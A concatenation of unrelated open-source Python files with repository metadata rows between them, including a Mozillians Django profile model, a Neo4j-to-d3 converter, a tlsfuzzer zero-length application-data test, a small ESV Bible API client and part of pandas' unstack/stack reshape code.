return self._privacy_fields['email']
return self.user.email
@property
def display_name(self):
return self.full_name
@property
def privacy_level(self):
"""Return user privacy clearance."""
if self.groups.filter(name='staff').exists():
return EMPLOYEES
if self.is_vouched:
return MOZILLIANS
return PUBLIC
@property
def is_complete(self):
"""Tests if a user has all the information needed to move on
past the original registration view.
"""
return self.display_name.strip() != ''
@property
def is_public(self):
"""Return True is any of the privacy protected fields is PUBLIC."""
for field in self._privacy_fields:
if getattr(self, 'privacy_%s' % field, None) == PUBLIC:
return True
return False
@property
def is_public_indexable(self):
"""For profile to be public indexable should have at least
full_name OR ircname OR email set to PUBLIC.
"""
for field in PUBLIC_INDEXABLE_FIELDS:
if (getattr(self, 'privacy_%s' % field, None) == PUBLIC and
getattr(self, field, None)):
return True
return False
def __unicode__(self):
"""Return this user's name when their profile is called."""
return self.display_name
def get_absolute_url(self):
return reverse('profile', args=[self.user.username])
def anonymize(self):
"""Remove personal info from a user"""
for name in ['first_name', 'last_name', 'email']:
setattr(self.user, name, '')
self.full_name = ''
# Give a random username
self.user.username = uuid.uuid4().hex[:30]
self.user.is_active = False
self.user.save()
for f in self._meta.fields:
if not f.editable or f.name in ['id', 'user']:
continue
if f.default == models.fields.NOT_PROVIDED:
raise Exception('No default value for %s' % f.name)
setattr(self, f.name, f.default)
for f in self._meta.many_to_many:
getattr(self, f.name).clear()
self.save()
def set_instance_privacy_level(self, level):
"""Sets privacy level of instance."""
self._privacy_level = level
def set_privacy_level(self, level, save=True):
"""Sets all privacy enabled fields to 'level'."""
for field in self._privacy_fields:
setattr(self, 'privacy_%s' % field, level)
if save:
self.save()
def set_membership(self, model, membership_list):
"""Alters membership to Groups, Skills and Languages."""
if model is Group:
m2mfield = self.groups
alias_model = GroupAlias
elif model is Skill:
m2mfield = self.skills
alias_model = SkillAlias
elif model is Language:
m2mfield = self.languages
alias_model = LanguageAlias
# Remove any non-system groups that weren't supplied in this list.
m2mfield.remove(*[g for g in m2mfield.all()
if g.name not in membership_list
and not getattr(g, 'system', False)])
# Add/create the rest of the groups
groups_to_add = []
for g in membership_list:
if alias_model.objects.filter(name=g).exists():
group = alias_model.objects.get(name=g).alias
else:
group = model.objects.create(name=g)
if not getattr(g, 'system', False):
groups_to_add.append(group)
m2mfield.add(*groups_to_add)
def get_photo_thumbnail(self, geometry='160x160', **kwargs):
if 'crop' not in kwargs:
kwargs['crop'] = 'center'
if self.photo:
return get_thumbnail(self.photo, geometry, **kwargs)
return get_thumbnail(settings.DEFAULT_AVATAR_PATH, geometry, **kwargs)
def get_photo_url(self, geometry='160x160', **kwargs):
"""Return photo url.
If privacy allows and no photo set, return gravatar link.
If privacy allows and photo set return local photo link.
If privacy doesn't allow return default local link.
"""
if not self.photo and self.privacy_photo >= self._privacy_level:
return gravatar(self.user.email, size=geometry)
return self.get_photo_thumbnail(geometry, **kwargs).url
def vouch(self, vouched_by, commit=True):
if self.is_vouched:
return
self.is_vouched = True
self.vouched_by = vouched_by
self.date_vouched = datetime.now()
if commit:
self.save()
self._email_now_vouched()
def auto_vouch(self):
"""Auto vouch mozilla.com users."""
email = self.user.email
if any(email.endswith('@' + x) for x in settings.AUTO_VOUCH_DOMAINS):
self.vouch(None, commit=False)
def add_to_staff_group(self):
"""Keep users in the staff group if they're autovouchable."""
email = self.user.email
staff, created = Group.objects.get_or_create(name='staff', system=True)
if any(email.endswith('@' + x) for x in
settings.AUTO_VOUCH_DOMAINS):
self.groups.add(staff)
elif staff in self.groups.all():
self.groups.remove(staff)
def _email_now_vouched(self):
"""Email this user, letting them know they are now vouched."""
subject = _(u'You are now vouched on Mozillians!')
message = _(u"You've now been vouched on Mozillians.org. "
"You'll now be able to search, vouch "
"and invite other Mozillians onto the site.")
send_mail(subject, message, settings.FROM_NOREPLY,
[self.user.email])
def save(self, *args, **kwargs):
self._privacy_level = None
self.auto_vouch()
super(UserProfile, self).save(*args, **kwargs)
self.add_to_staff_group()
@classmethod
def get_index(cls, public_index=False):
if public_index:
return settings.ES_INDEXES['public']
return settings.ES_INDEXES['default']
@classmethod
def index(cls, document, id_=None, bulk=False, force_insert=False,
es=None, public_index=False):
""" Overide elasticutils.index() to support more than one index
for UserProfile model.
"""
if bulk and es is None:
raise ValueError('bulk is True, but es is None')
if es is None:
es = get_es()
es.index(document, index=cls.get_index(public_index),
doc_type=cls.get_mapping_type(),
id=id_, bulk=bulk, force_insert=force_insert)
@classmethod
def unindex(cls, id, es=None, public_index=False):
if es is None:
es = get_es()
es.delete(cls.get_index(public_index), cls.get_mapping_type(), id)
@receiver(dbsignals.post_save, sender=User,
dispatch_uid='create_user_profile_sig')
def create_user_profile(sender, instance, created, raw, **kwargs):
if not raw:
up, created = UserProfile.objects.get_or_create(user=instance)
if not created:
dbsignals.post_save.send(sender=UserProfile, instance=up,
created=created, raw=raw)
@receiver(dbsignals.post_save, sender=UserProfile,
dispatch_uid='update_basket_sig')
def update_basket(sender, instance, **kwargs):
update_basket_task.delay(instance.id)
@receiver(dbsignals.post_save, sender=UserProfile,
dispatch_uid='update_search_index_sig')
def update_search_index(sender, instance, **kwargs):
if instance.is_complete:
index_objects.delay(sender, [instance.id], public=False)
if instance.is_public_indexable:
index_objects.delay(sender, [instance.id], public_index=True)
else:
unindex_objects(UserProfile, [instance.id], public_index=True)
@receiver(dbsignals.post_delete, sender=UserProfile,
dispatch_uid='remove_from_search_index_sig')
def remove_from_search_index(sender, instance, **kwargs):
unindex_objects(UserProfile, [instance.id], public_index=False)
unindex_objects(UserProfile, [instance.id], public_index=True)
class UsernameBlacklist(models.Model):
value = models.CharField(max_length=30, unique=True)
is_regex = models.BooleanField(default=False)
def __unicode__(self):
return self.value
class Meta:
ordering = ['value']
| bsd-3-clause | -7,662,934,216,234,882,000 | 36.6 | 79 | 0.583421 | false |
tommilligan/isoprene-pumpjack | isoprene_pumpjack/utils/neo_to_d3.py | 1 | 2463 | #!/usr/bin/env python
'''
Transformation of Neo4J result object into a d3 friendly dictionary.
'''
def dedupe_dict_list(duped, id_prop="id"):
'''Dedupe a list of dicts by a dictionary property'''
deduped = list({v[id_prop]:v for v in duped}.values())
return deduped
def neo_node_to_d3_node(node):
d3node = {
"id": node.id,
"labels": [label for label in node.labels],
"props": {k: v for k, v in node.items()}
}
return d3node
def neo_link_to_d3_link(link):
d3link = {
"id": link.id,
"source": link.start,
"target": link.end,
"labels": [link.type],
"props": {k: v for k, v in link.items()}
}
return d3link
def neo_to_d3(result, nodeLabels=[], linkLabels=[]):
'''
Convert neo results to d3 drawable nodes/links object
Takes
* the neo result (BoltStatementResult)
* a list of node labels (string[])
* a list of link labels (string[])
Dedupes to the standard format:
{
nodes: [
{
id: string,
labels: string[],
                props: {}
}
],
links: [
{
id: string,
source: string, # id of a node
target: string, # id of a node
labels: string[],
                props: {}
}
]
}
'''
d3data = {
"nodes": [],
"links": []
}
process_neo_objects = [
{
"labels": nodeLabels,
"function": neo_node_to_d3_node,
"d3key": "nodes"
},
{
"labels": linkLabels,
"function": neo_link_to_d3_link,
"d3key": "links"
}
]
for record in result:
for process in process_neo_objects:
for label in process["labels"]:
neo_objects = record[label]
if isinstance(neo_objects, list):
for neo_object in neo_objects:
d3object = process["function"](neo_object)
d3data[process["d3key"]].append(d3object)
else:
neo_object = neo_objects
d3object = process["function"](neo_object)
d3data[process["d3key"]].append(d3object)
d3data[process["d3key"]] = dedupe_dict_list(d3data[process["d3key"]], "id")
return d3data
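# --- Editor's sketch (not part of the original file) --------------------------
# dedupe_dict_list() is the only piece that runs without a Neo4j driver; a toy
# run shows how records sharing an id collapse before neo_to_d3 returns.
def _example_dedupe():  # pragma: no cover - illustrative only
    nodes = [
        {"id": 1, "labels": ["Person"], "props": {"name": "Ada"}},
        {"id": 1, "labels": ["Person"], "props": {"name": "Ada"}},
        {"id": 2, "labels": ["Person"], "props": {"name": "Bob"}},
    ]
    return dedupe_dict_list(nodes, "id")  # two entries remain, ids 1 and 2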
| apache-2.0 | -6,120,799,362,977,779,000 | 25.483871 | 87 | 0.484369 | false |
tomato42/tlsfuzzer | scripts/test-zero-length-data.py | 1 | 6794 | # Author: Hubert Kario, (c) 2015
# Released under Gnu GPL v2.0, see LICENSE file for details
"""Example empty appd data test"""
from __future__ import print_function
import traceback
from random import sample
import sys
import re
import getopt
from tlsfuzzer.runner import Runner
from tlsfuzzer.messages import Connect, ClientHelloGenerator, \
ClientKeyExchangeGenerator, ChangeCipherSpecGenerator, \
FinishedGenerator, ApplicationDataGenerator, \
AlertGenerator
from tlsfuzzer.expect import ExpectServerHello, ExpectCertificate, \
ExpectServerHelloDone, ExpectChangeCipherSpec, ExpectFinished, \
ExpectAlert, ExpectClose, ExpectApplicationData
from tlslite.constants import CipherSuite, AlertLevel, AlertDescription
from tlsfuzzer.utils.lists import natural_sort_keys
version = 2
def help_msg():
print("Usage: <script-name> [-h hostname] [-p port] [[probe-name] ...]")
print(" -h hostname name of the host to run the test against")
print(" localhost by default")
print(" -p port port number to use for connection, 4433 by default")
print(" -e probe-name exclude the probe from the list of the ones run")
print(" may be specified multiple times")
print(" -n num run 'num' or all(if 0) tests instead of default(all)")
print(" (excluding \"sanity\" tests)")
print(" -x probe-name expect the probe to fail. When such probe passes despite being marked like this")
print(" it will be reported in the test summary and the whole script will fail.")
print(" May be specified multiple times.")
print(" -X message expect the `message` substring in exception raised during")
print(" execution of preceding expected failure probe")
print(" usage: [-x probe-name] [-X exception], order is compulsory!")
print(" --help this message")
def main():
"""check if app data records with zero payload are accepted by server"""
conversations = {}
host = "localhost"
port = 4433
num_limit = None
run_exclude = set()
expected_failures = {}
last_exp_tmp = None
argv = sys.argv[1:]
opts, argv = getopt.getopt(argv, "h:p:e:n:x:X:", ["help"])
for opt, arg in opts:
if opt == '-h':
host = arg
elif opt == '-p':
port = int(arg)
elif opt == '--help':
help_msg()
sys.exit(0)
elif opt == '-e':
run_exclude.add(arg)
elif opt == '-n':
num_limit = int(arg)
elif opt == '-x':
expected_failures[arg] = None
last_exp_tmp = str(arg)
elif opt == '-X':
if not last_exp_tmp:
raise ValueError("-x has to be specified before -X")
expected_failures[last_exp_tmp] = str(arg)
else:
raise ValueError("Unknown option: {0}".format(opt))
if argv:
help_msg()
raise ValueError("Unknown options: {0}".format(argv))
conversation = Connect(host, port)
node = conversation
ciphers = [CipherSuite.TLS_RSA_WITH_AES_128_CBC_SHA,
CipherSuite.TLS_EMPTY_RENEGOTIATION_INFO_SCSV]
node = node.add_child(ClientHelloGenerator(ciphers))
node = node.add_child(ExpectServerHello())
node = node.add_child(ExpectCertificate())
node = node.add_child(ExpectServerHelloDone())
node = node.add_child(ClientKeyExchangeGenerator())
node = node.add_child(ChangeCipherSpecGenerator())
node = node.add_child(FinishedGenerator())
node = node.add_child(ExpectChangeCipherSpec())
node = node.add_child(ExpectFinished())
node = node.add_child(ApplicationDataGenerator(bytearray(0)))
text = b"GET / HTTP/1.0\nX-bad: aaaa\n\n"
node = node.add_child(ApplicationDataGenerator(text))
node = node.add_child(ExpectApplicationData())
node = node.add_child(AlertGenerator(AlertLevel.warning,
AlertDescription.close_notify))
node = node.add_child(ExpectAlert(AlertLevel.warning,
AlertDescription.close_notify))
node.next_sibling = ExpectClose()
node = node.add_child(ExpectClose())
conversations["zero-length app data"] = \
conversation
# run the conversation
good = 0
bad = 0
xfail = 0
xpass = 0
failed = []
xpassed = []
if not num_limit:
num_limit = len(conversations)
sampled_tests = sample(list(conversations.items()), len(conversations))
for c_name, conversation in sampled_tests:
if c_name in run_exclude:
continue
print("{0} ...".format(c_name))
runner = Runner(conversation)
res = True
exception = None
#because we don't want to abort the testing and we are reporting
#the errors to the user, using a bare except is OK
#pylint: disable=bare-except
try:
runner.run()
except Exception as exp:
exception = exp
print("Error while processing")
print(traceback.format_exc())
res = False
#pylint: enable=bare-except
if c_name in expected_failures:
if res:
xpass += 1
xpassed.append(c_name)
print("XPASS-expected failure but test passed\n")
else:
if expected_failures[c_name] is not None and \
expected_failures[c_name] not in str(exception):
bad += 1
failed.append(c_name)
print("Expected error message: {0}\n"
.format(expected_failures[c_name]))
else:
xfail += 1
print("OK-expected failure\n")
else:
if res:
good+=1
print("OK")
else:
bad+=1
print("Test end")
print(20 * '=')
print("version: {0}".format(version))
print(20 * '=')
print("TOTAL: {0}".format(len(sampled_tests)))
print("SKIP: {0}".format(len(run_exclude.intersection(conversations.keys()))))
print("PASS: {0}".format(good))
print("XFAIL: {0}".format(xfail))
print("FAIL: {0}".format(bad))
print("XPASS: {0}".format(xpass))
print(20 * '=')
sort = sorted(xpassed ,key=natural_sort_keys)
if len(sort):
print("XPASSED:\n\t{0}".format('\n\t'.join(repr(i) for i in sort)))
sort = sorted(failed, key=natural_sort_keys)
if len(sort):
print("FAILED:\n\t{0}".format('\n\t'.join(repr(i) for i in sort)))
if bad > 0:
sys.exit(1)
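# Editor's note (sketch, not part of the original script): a typical invocation
# against a local TLS server would combine the flags described in help_msg()
# above, e.g.
#
#     python test-zero-length-data.py -h localhost -p 4433
#
# The exact command layout is an assumption, not taken from the original file.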
if __name__ == "__main__":
main()
| gpl-2.0 | 8,951,013,126,996,592,000 | 35.724324 | 108 | 0.583898 | false |
fifengine/fifengine-demos | rpg/scripts/misc/serializer.py | 1 | 1203 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# ####################################################################
# Copyright (C) 2005-2013 by the FIFE team
# http://www.fifengine.net
# This file is part of FIFE.
#
# FIFE is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
# ####################################################################
from builtins import object
class Serializer(object):
def __init__(self):
return
def serialize(self):
pass
def deserialize(self, valuedict=None):
pass
| lgpl-2.1 | -224,521,764,962,530,180 | 30.657895 | 70 | 0.637573 | false |
CERN/TIGRE | Python/tests/stdout_test.py | 1 | 1107 | import StringIO
import os
import sys
import unittest
import numpy as np
import tigre
import tigre.algorithms as algs
from tigre.demos.Test_data import data_loader
dirname = os.path.dirname(__file__)
class TestStdout(unittest.TestCase):
pass
def test_generator(algorithm, proj, geo, angles, niter):
def test(self):
capturedOutput = StringIO.StringIO()
sys.stdout = capturedOutput
getattr(algs, algorithm)(proj, geo, angles, niter=niter, verbose=False)
self.assertIs(capturedOutput.getvalue(), "")
sys.stdout = sys.__stdout__
return test
if __name__ == "__main__":
geo = tigre.geometry(mode="cone", default=True, high_quality=False)
print(geo)
true_img = data_loader.load_head_phantom(geo.nVoxel)
angles = np.linspace(0, 2 * np.pi, 100)
niter = 5
proj = tigre.Ax(true_img, geo, angles)
for alg in algs.__all__:
if alg != "fbp":
test_name = "test_print_%s" % (alg)
test = test_generator(alg, proj, geo, angles, niter)
setattr(TestStdout, test_name, test)
unittest.main()
| bsd-3-clause | -336,089,485,312,780,740 | 24.744186 | 79 | 0.641373 | false |
mintchaos/django_esv | esv/__init__.py | 1 | 1497 | import urllib
import httplib2
from django.conf import settings
class EsvClientError(Exception):
pass
class PassageNotFoundError(EsvClientError):
pass
class EsvQuotaExceededError(EsvClientError):
pass
class EsvClient(object):
def __init__(self, key='IP'):
http_cache = getattr(settings, 'ESV_HTTP_CACHE', '/tmp/esv_http_cache')
self.http = httplib2.Http(http_cache)
self.key = key
self._cache = {}
def get_passage(self, passage, headings=False, audio=True, footnotes=False, audio_format="flash"):
params_dict = {
'passage': passage,
'include-headings': headings,
'include_footnotes': footnotes,
'include-word-ids': False,
'include-first-verse-numbers': False,
'include-audio-link': audio,
'audio-format': audio_format,
}
params = urllib.urlencode(params_dict).lower()
# TODO: Check cache here
resp, content = self.http.request("http://www.esvapi.org/v2/rest/passageQuery?key=%s&%s" % (self.key, params), "GET")
if content.startswith("ERROR"):
if content.lower().find('no results found') > 0:
raise PassageNotFoundError
if content.lower().find('you have exceeded your quota') > 0:
raise EsvQuotaExceededError
raise EsvClientError
# TODO: Set cache here
return content
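# --- Editor's sketch (not part of the original file) --------------------------
# Hypothetical usage; it needs network access to esvapi.org, counts against the
# API quota, and the passage reference is illustrative only.
def _example_esv_usage():  # pragma: no cover - illustrative only
    client = EsvClient(key='IP')
    return client.get_passage('John 1', headings=True, audio=False)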
# main instance of the esv client
esv = EsvClient()
| bsd-3-clause | 5,610,947,664,951,156,000 | 31.565217 | 125 | 0.613894 | false |
MJuddBooth/pandas | pandas/core/reshape/reshape.py | 1 | 36628 | # pylint: disable=E1101,E1103
# pylint: disable=W0703,W0622,W0613,W0201
from functools import partial
import itertools
import numpy as np
from pandas._libs import algos as _algos, reshape as _reshape
from pandas._libs.sparse import IntIndex
from pandas.compat import PY2, range, text_type, u, zip
from pandas.core.dtypes.cast import maybe_promote
from pandas.core.dtypes.common import (
ensure_platform_int, is_bool_dtype, is_extension_array_dtype,
is_integer_dtype, is_list_like, is_object_dtype, needs_i8_conversion)
from pandas.core.dtypes.missing import notna
from pandas import compat
import pandas.core.algorithms as algos
from pandas.core.arrays import SparseArray
from pandas.core.arrays.categorical import _factorize_from_iterable
from pandas.core.frame import DataFrame
from pandas.core.index import Index, MultiIndex
from pandas.core.internals.arrays import extract_array
from pandas.core.series import Series
from pandas.core.sorting import (
compress_group_index, decons_obs_group_ids, get_compressed_ids,
get_group_index)
class _Unstacker(object):
"""
Helper class to unstack data / pivot with multi-level index
Parameters
----------
values : ndarray
Values of DataFrame to "Unstack"
index : object
Pandas ``Index``
level : int or str, default last level
Level to "unstack". Accepts a name for the level.
value_columns : Index, optional
Pandas ``Index`` or ``MultiIndex`` object if unstacking a DataFrame
fill_value : scalar, optional
Default value to fill in missing values if subgroups do not have the
same set of labels. By default, missing values will be replaced with
the default fill value for that data type, NaN for float, NaT for
    datetimelike, etc. For integer types, by default data will be converted to
float and missing values will be set to NaN.
constructor : object
Pandas ``DataFrame`` or subclass used to create unstacked
response. If None, DataFrame or SparseDataFrame will be used.
Examples
--------
>>> index = pd.MultiIndex.from_tuples([('one', 'a'), ('one', 'b'),
... ('two', 'a'), ('two', 'b')])
>>> s = pd.Series(np.arange(1, 5, dtype=np.int64), index=index)
>>> s
one a 1
b 2
two a 3
b 4
dtype: int64
>>> s.unstack(level=-1)
a b
one 1 2
two 3 4
>>> s.unstack(level=0)
one two
a 1 3
b 2 4
Returns
-------
unstacked : DataFrame
"""
def __init__(self, values, index, level=-1, value_columns=None,
fill_value=None, constructor=None):
if values.ndim == 1:
values = values[:, np.newaxis]
self.values = values
self.value_columns = value_columns
self.fill_value = fill_value
if constructor is None:
constructor = DataFrame
self.constructor = constructor
if value_columns is None and values.shape[1] != 1: # pragma: no cover
raise ValueError('must pass column labels for multi-column data')
self.index = index.remove_unused_levels()
self.level = self.index._get_level_number(level)
# when index includes `nan`, need to lift levels/strides by 1
self.lift = 1 if -1 in self.index.codes[self.level] else 0
self.new_index_levels = list(self.index.levels)
self.new_index_names = list(self.index.names)
self.removed_name = self.new_index_names.pop(self.level)
self.removed_level = self.new_index_levels.pop(self.level)
self.removed_level_full = index.levels[self.level]
# Bug fix GH 20601
# If the data frame is too big, the number of unique index combination
# will cause int32 overflow on windows environments.
# We want to check and raise an error before this happens
num_rows = np.max([index_level.size for index_level
in self.new_index_levels])
num_columns = self.removed_level.size
# GH20601: This forces an overflow if the number of cells is too high.
num_cells = np.multiply(num_rows, num_columns, dtype=np.int32)
if num_rows > 0 and num_columns > 0 and num_cells <= 0:
raise ValueError('Unstacked DataFrame is too big, '
'causing int32 overflow')
self._make_sorted_values_labels()
self._make_selectors()
def _make_sorted_values_labels(self):
v = self.level
codes = list(self.index.codes)
levs = list(self.index.levels)
to_sort = codes[:v] + codes[v + 1:] + [codes[v]]
sizes = [len(x) for x in levs[:v] + levs[v + 1:] + [levs[v]]]
comp_index, obs_ids = get_compressed_ids(to_sort, sizes)
ngroups = len(obs_ids)
indexer = _algos.groupsort_indexer(comp_index, ngroups)[0]
indexer = ensure_platform_int(indexer)
self.sorted_values = algos.take_nd(self.values, indexer, axis=0)
self.sorted_labels = [l.take(indexer) for l in to_sort]
def _make_selectors(self):
new_levels = self.new_index_levels
# make the mask
remaining_labels = self.sorted_labels[:-1]
level_sizes = [len(x) for x in new_levels]
comp_index, obs_ids = get_compressed_ids(remaining_labels, level_sizes)
ngroups = len(obs_ids)
comp_index = ensure_platform_int(comp_index)
stride = self.index.levshape[self.level] + self.lift
self.full_shape = ngroups, stride
selector = self.sorted_labels[-1] + stride * comp_index + self.lift
mask = np.zeros(np.prod(self.full_shape), dtype=bool)
mask.put(selector, True)
if mask.sum() < len(self.index):
raise ValueError('Index contains duplicate entries, '
'cannot reshape')
self.group_index = comp_index
self.mask = mask
self.unique_groups = obs_ids
self.compressor = comp_index.searchsorted(np.arange(ngroups))
def get_result(self):
values, _ = self.get_new_values()
columns = self.get_new_columns()
index = self.get_new_index()
return self.constructor(values, index=index, columns=columns)
def get_new_values(self):
values = self.values
# place the values
length, width = self.full_shape
stride = values.shape[1]
result_width = width * stride
result_shape = (length, result_width)
mask = self.mask
mask_all = mask.all()
# we can simply reshape if we don't have a mask
if mask_all and len(values):
new_values = (self.sorted_values
.reshape(length, width, stride)
.swapaxes(1, 2)
.reshape(result_shape)
)
new_mask = np.ones(result_shape, dtype=bool)
return new_values, new_mask
# if our mask is all True, then we can use our existing dtype
if mask_all:
dtype = values.dtype
new_values = np.empty(result_shape, dtype=dtype)
else:
dtype, fill_value = maybe_promote(values.dtype, self.fill_value)
new_values = np.empty(result_shape, dtype=dtype)
new_values.fill(fill_value)
new_mask = np.zeros(result_shape, dtype=bool)
name = np.dtype(dtype).name
sorted_values = self.sorted_values
# we need to convert to a basic dtype
# and possibly coerce an input to our output dtype
# e.g. ints -> floats
if needs_i8_conversion(values):
sorted_values = sorted_values.view('i8')
new_values = new_values.view('i8')
name = 'int64'
elif is_bool_dtype(values):
sorted_values = sorted_values.astype('object')
new_values = new_values.astype('object')
name = 'object'
else:
sorted_values = sorted_values.astype(name, copy=False)
# fill in our values & mask
f = getattr(_reshape, "unstack_{name}".format(name=name))
f(sorted_values,
mask.view('u1'),
stride,
length,
width,
new_values,
new_mask.view('u1'))
# reconstruct dtype if needed
if needs_i8_conversion(values):
new_values = new_values.view(values.dtype)
return new_values, new_mask
def get_new_columns(self):
if self.value_columns is None:
if self.lift == 0:
return self.removed_level
lev = self.removed_level
return lev.insert(0, lev._na_value)
stride = len(self.removed_level) + self.lift
width = len(self.value_columns)
propagator = np.repeat(np.arange(width), stride)
if isinstance(self.value_columns, MultiIndex):
new_levels = self.value_columns.levels + (self.removed_level_full,)
new_names = self.value_columns.names + (self.removed_name,)
new_codes = [lab.take(propagator)
for lab in self.value_columns.codes]
else:
new_levels = [self.value_columns, self.removed_level_full]
new_names = [self.value_columns.name, self.removed_name]
new_codes = [propagator]
# The two indices differ only if the unstacked level had unused items:
if len(self.removed_level_full) != len(self.removed_level):
# In this case, we remap the new codes to the original level:
repeater = self.removed_level_full.get_indexer(self.removed_level)
if self.lift:
repeater = np.insert(repeater, 0, -1)
else:
# Otherwise, we just use each level item exactly once:
repeater = np.arange(stride) - self.lift
# The entire level is then just a repetition of the single chunk:
new_codes.append(np.tile(repeater, width))
return MultiIndex(levels=new_levels, codes=new_codes,
names=new_names, verify_integrity=False)
def get_new_index(self):
result_codes = [lab.take(self.compressor)
for lab in self.sorted_labels[:-1]]
# construct the new index
if len(self.new_index_levels) == 1:
lev, lab = self.new_index_levels[0], result_codes[0]
if (lab == -1).any():
lev = lev.insert(len(lev), lev._na_value)
return lev.take(lab)
return MultiIndex(levels=self.new_index_levels, codes=result_codes,
names=self.new_index_names, verify_integrity=False)
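# --- Illustrative sketch, not part of the original module --------------------
# _Unstacker is normally driven through Series.unstack() / DataFrame.unstack()
# (see unstack() further below).  The hypothetical helper here shows the
# equivalent direct call, reusing the small Series from the class docstring.
def _example_direct_unstacker_use():
    import numpy as np
    import pandas as pd
    index = pd.MultiIndex.from_tuples([('one', 'a'), ('one', 'b'),
                                       ('two', 'a'), ('two', 'b')])
    s = pd.Series(np.arange(1, 5, dtype=np.int64), index=index)
    # Equivalent to s.unstack(level=-1): a 2x2 frame with columns 'a' and 'b'.
    unstacker = _Unstacker(s.values, s.index, level=-1,
                           constructor=s._constructor_expanddim)
    return unstacker.get_result()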
def _unstack_multiple(data, clocs, fill_value=None):
if len(clocs) == 0:
return data
# NOTE: This doesn't deal with hierarchical columns yet
index = data.index
clocs = [index._get_level_number(i) for i in clocs]
rlocs = [i for i in range(index.nlevels) if i not in clocs]
clevels = [index.levels[i] for i in clocs]
ccodes = [index.codes[i] for i in clocs]
cnames = [index.names[i] for i in clocs]
rlevels = [index.levels[i] for i in rlocs]
rcodes = [index.codes[i] for i in rlocs]
rnames = [index.names[i] for i in rlocs]
shape = [len(x) for x in clevels]
group_index = get_group_index(ccodes, shape, sort=False, xnull=False)
comp_ids, obs_ids = compress_group_index(group_index, sort=False)
recons_codes = decons_obs_group_ids(comp_ids, obs_ids, shape, ccodes,
xnull=False)
if rlocs == []:
# Everything is in clocs, so the dummy df has a regular index
dummy_index = Index(obs_ids, name='__placeholder__')
else:
dummy_index = MultiIndex(levels=rlevels + [obs_ids],
codes=rcodes + [comp_ids],
names=rnames + ['__placeholder__'],
verify_integrity=False)
if isinstance(data, Series):
dummy = data.copy()
dummy.index = dummy_index
unstacked = dummy.unstack('__placeholder__', fill_value=fill_value)
new_levels = clevels
new_names = cnames
new_codes = recons_codes
else:
if isinstance(data.columns, MultiIndex):
result = data
for i in range(len(clocs)):
val = clocs[i]
result = result.unstack(val)
clocs = [v if i > v else v - 1 for v in clocs]
return result
dummy = data.copy()
dummy.index = dummy_index
unstacked = dummy.unstack('__placeholder__', fill_value=fill_value)
if isinstance(unstacked, Series):
unstcols = unstacked.index
else:
unstcols = unstacked.columns
new_levels = [unstcols.levels[0]] + clevels
new_names = [data.columns.name] + cnames
new_codes = [unstcols.codes[0]]
for rec in recons_codes:
new_codes.append(rec.take(unstcols.codes[-1]))
new_columns = MultiIndex(levels=new_levels, codes=new_codes,
names=new_names, verify_integrity=False)
if isinstance(unstacked, Series):
unstacked.index = new_columns
else:
unstacked.columns = new_columns
return unstacked
def unstack(obj, level, fill_value=None):
if isinstance(level, (tuple, list)):
if len(level) != 1:
# _unstack_multiple only handles MultiIndexes,
# and isn't needed for a single level
return _unstack_multiple(obj, level, fill_value=fill_value)
else:
level = level[0]
if isinstance(obj, DataFrame):
if isinstance(obj.index, MultiIndex):
return _unstack_frame(obj, level, fill_value=fill_value)
else:
return obj.T.stack(dropna=False)
else:
if is_extension_array_dtype(obj.dtype):
return _unstack_extension_series(obj, level, fill_value)
unstacker = _Unstacker(obj.values, obj.index, level=level,
fill_value=fill_value,
constructor=obj._constructor_expanddim)
return unstacker.get_result()
def _unstack_frame(obj, level, fill_value=None):
if obj._is_mixed_type:
unstacker = partial(_Unstacker, index=obj.index,
level=level, fill_value=fill_value)
blocks = obj._data.unstack(unstacker,
fill_value=fill_value)
return obj._constructor(blocks)
else:
unstacker = _Unstacker(obj.values, obj.index, level=level,
value_columns=obj.columns,
fill_value=fill_value,
constructor=obj._constructor)
return unstacker.get_result()
def _unstack_extension_series(series, level, fill_value):
"""
Unstack an ExtensionArray-backed Series.
The ExtensionDtype is preserved.
Parameters
----------
series : Series
A Series with an ExtensionArray for values
level : Any
The level name or number.
fill_value : Any
The user-level (not physical storage) fill value to use for
missing values introduced by the reshape. Passed to
``series.values.take``.
Returns
-------
DataFrame
Each column of the DataFrame will have the same dtype as
the input Series.
"""
# Implementation note: the basic idea is to
# 1. Do a regular unstack on a dummy array of integers
# 2. Followup with a columnwise take.
# We use the dummy take to discover newly-created missing values
# introduced by the reshape.
from pandas.core.reshape.concat import concat
dummy_arr = np.arange(len(series))
# fill_value=-1, since we will do a series.values.take later
result = _Unstacker(dummy_arr, series.index,
level=level, fill_value=-1).get_result()
out = []
values = extract_array(series, extract_numpy=False)
for col, indices in result.iteritems():
out.append(Series(values.take(indices.values,
allow_fill=True,
fill_value=fill_value),
name=col, index=result.index))
return concat(out, axis='columns', copy=False, keys=result.columns)
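# --- Illustrative sketch, not part of the original module --------------------
# Hypothetical example for the helper above: unstacking an extension-dtype
# (here categorical) Series is routed through _unstack_extension_series by
# unstack() below, so every resulting column keeps the 'category' dtype
# instead of being coerced to object.
def _example_unstack_categorical():
    import pandas as pd
    index = pd.MultiIndex.from_tuples([('one', 'a'), ('one', 'b'),
                                       ('two', 'a'), ('two', 'b')])
    s = pd.Series(pd.Categorical(['x', 'y', 'x', 'y']), index=index)
    result = s.unstack()
    return result.dtypes  # expected: 'category' for both columns 'a' and 'b'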
def stack(frame, level=-1, dropna=True):
"""
Convert DataFrame to Series with multi-level Index. Columns become the
second level of the resulting hierarchical index
Returns
-------
stacked : Series
"""
def factorize(index):
if index.is_unique:
return index, np.arange(len(index))
codes, categories = _factorize_from_iterable(index)
return categories, codes
N, K = frame.shape
# Will also convert negative level numbers and check if out of bounds.
level_num = frame.columns._get_level_number(level)
if isinstance(frame.columns, MultiIndex):
return _stack_multi_columns(frame, level_num=level_num, dropna=dropna)
elif isinstance(frame.index, MultiIndex):
new_levels = list(frame.index.levels)
new_codes = [lab.repeat(K) for lab in frame.index.codes]
clev, clab = factorize(frame.columns)
new_levels.append(clev)
new_codes.append(np.tile(clab, N).ravel())
new_names = list(frame.index.names)
new_names.append(frame.columns.name)
